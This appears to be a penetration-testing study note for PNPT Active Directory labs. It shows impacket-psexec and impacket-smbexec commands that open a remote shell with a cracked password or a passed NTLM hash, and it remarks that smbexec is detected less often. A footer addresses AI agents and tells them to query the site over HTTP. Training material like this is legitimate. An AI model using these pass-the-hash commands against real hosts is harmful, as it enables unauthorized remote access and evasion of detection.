# Shell Acess ## Gaining Shell Access Overview If we're able to dump the SAM in the SMB Relay attack then we can use those hashes to pop a shell on a machine. We can use the actual password of the user if we cracked it or we can **pass the hash** instead. ## Impacket-psexec ```sh impacket-psexec PNPT/pparker:'Password2'@192.168.1.128 impacket-psexec administrator@192.168.1.128 -hashes aad3b435b51404eeaad3b435b51404ee:7facdc498ed1680c4fd1448319a8c04f ``` {% hint style="info" %} **Impacket-wmiexec** and **Impacket-smbexec** are also options that work the same way. **Impacket-smbexec** gets picked up much less than the others ```bash impacket-smbexec administrator@192.168.1.128 -hashes aad3b435b51404eeaad3b435b51404ee:7facdc498ed1680c4fd1448319a8c04f ``` {% endhint %} --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://pnpt.adot8.com/active-directory/initial-attack-strategy/shell-acess.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.